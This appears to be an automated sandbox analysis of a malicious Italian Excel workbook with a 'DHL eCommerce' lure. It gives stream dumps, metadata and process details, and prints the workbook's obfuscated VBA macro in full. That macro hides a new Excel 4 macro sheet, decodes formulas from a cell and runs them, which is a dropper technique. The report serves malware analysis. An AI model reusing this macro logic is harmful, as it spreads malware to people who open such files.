                                                                                                                                                Data Raw:01 16 03 00 06 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 de 12 00 00 0e 00 00 00 01 00 00 00 db f6 f5 c7 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 18 c9 7f a3 ee 7e 08 48 9e f3 5b 96 bf be 15 c1 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Questa_cartella_di_lavoro"
                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                Public Function Mali_i(R As String, S As Long) As Variant
                                                                                                                                                Dim E As Long, F As Long
                                                                                                                                                Dim L() As String
                                                                                                                                                ReDim L(0 To CLng((Aii(R) / S) - 1))
                                                                                                                                                For E = 1 To Aii(R) Step S
                                                                                                                                                L(F) = Mid(R, E, S): F = F + 1
                                                                                                                                                Next
                                                                                                                                                Mali_i = L
                                                                                                                                                End Function
                                                                                                                                                Function versione(un As String, u As Integer)
                                                                                                                                                u = R: Sheets(1).[F4].FormulaLocal = un
                                                                                                                                                End Function
                                                                                                                                                Function nostri()
                                                                                                                                                nostri = Lmeet & "R" & "I"
                                                                                                                                                End Function
                                                                                                                                                Function Utilizziamo()
                                                                                                                                                uk = 7: Sheets(4 - 3).Cells(28, 6).FormulaLocal = nostri & Questo
                                                                                                                                                End Function
                                                                                                                                                Sub documento_ingrandisci()
                                                                                                                                                fg = 3
                                                                                                                                                Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
                                                                                                                                                O = migliorare
                                                                                                                                                For Each oo In per_u
                                                                                                                                                fg = 1: fg = 5: vG = (versione(Lmeet & oo, 1 + fg)): fg = 112: OOi ((fg))
                                                                                                                                                Next
                                                                                                                                                End Sub
                                                                                                                                                Function Aii(ii As String)
                                                                                                                                                m = j: m = ii
                                                                                                                                                Aii = Len(m)
                                                                                                                                                End Function
                                                                                                                                                Function inglese() As String
                                                                                                                                                inglese = Ecco_la & "RN"
                                                                                                                                                End Function
                                                                                                                                                Sub l_esperienza()
                                                                                                                                                ActiveSheet.Visible = 0
                                                                                                                                                End Sub
                                                                                                                                                Sub OOi(E As Long)
                                                                                                                                                i = E: Run ("" & "F" & 3)
                                                                                                                                                End Sub
                                                                                                                                                Function per_u() As Variant
                                                                                                                                                H = 45
                                                                                                                                                For Each G In Mali_i(Cells(111, 11), 3)
                                                                                                                                                If Not (IsNumeric(G)) Then gb = LTrim(Left(G, Aii("" & G) - 1)) Else gb = LTrim(G)
                                                                                                                                                j = j & Chr(gb)
                                                                                                                                                Next
                                                                                                                                                per_u = Split(j, "" & "b")
                                                                                                                                                End Function
                                                                                                                                                Function migliorare()
                                                                                                                                                migliorare = Utilizziamo
                                                                                                                                                End Function
                                                                                                                                                Function Ecco_la() As String
                                                                                                                                                Ecco_la = "O"
                                                                                                                                                End Function
                                                                                                                                                Function Lmeet()
                                                                                                                                                Lmeet = Ecco_la: Lmeet = "="
                                                                                                                                                End Function
                                                                                                                                                Function Questo()
                                                                                                                                                Questo = "T" & inglese & "O" & "()"
                                                                                                                                                End Function

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 118
                                                                                                                                                General
                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:118
                                                                                                                                                Entropy:4.32915524493
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 256
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:256
                                                                                                                                                Entropy:2.93701810907
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 5 O t t o b r e 2 0 2 1 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a8 00 00 00
                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:168
                                                                                                                                                Entropy:3.28177594722
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . x . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . @ . . . . . b L u . . . @ . . . . . . M u . . . . . . . . . . . . . . . . . . . D H L e C o m m e r c e . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 0c 00 00 00 40 00 00 00 0d 00 00 00 4c 00 00 00 13 00 00 00 58 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 d0 a9 62 4c 75 c9 d7 01 40 00 00 00
                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 33853
                                                                                                                                                General
                                                                                                                                                Stream Path:Workbook
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                Stream Size:33853
                                                                                                                                                Entropy:6.73233637776
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 456
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:456
                                                                                                                                                Entropy:5.377356144
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 6 A C 0 6 E B A - 0 7 B 1 - 4 2 9 C - 8 2 F 5 - D E D 7 F B 1 B 6 7 9 A } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E A E 8 F 6 F 6 E C F A E C F A E C F A E C F A " . . D P B = " D C D E C 0 0 8 4 0 F B 4 1 F B 4 1 F B " . . G C = "
                                                                                                                                                Data Raw:49 44 3d 22 7b 36 41 43 30 36 45 42 41 2d 30 37 42 31 2d 34 32 39 43 2d 38 32 46 35 2d 44 45 44 37 46 42 31 42 36 37 39 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:104
                                                                                                                                                Entropy:3.33133492199
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
                                                                                                                                                Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3001
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:3001
                                                                                                                                                Entropy:4.43371678205
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2045
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2045
                                                                                                                                                Entropy:3.40859565094
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . x . . . . W O . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 286
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:286
                                                                                                                                                Entropy:1.82389983631
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . u n . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . i i . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 2797
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2797
                                                                                                                                                Entropy:1.98186316831
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 d0 00 00 00 00 00 00 00 00 00 00 00 0e 00 0e 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1000
                                                                                                                                                Entropy:2.49976580289
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . H . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . P .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 58 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 0c 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 562
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:562
                                                                                                                                                Entropy:6.25076850743
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . g c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                                                                                                                                                Data Raw:01 2e b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 c1 19 a0 67 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                                                                                                                                                Network Behavior

                                                                                                                                                No network behavior found

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:10:50:22
                                                                                                                                                Start date:25/10/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x840000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >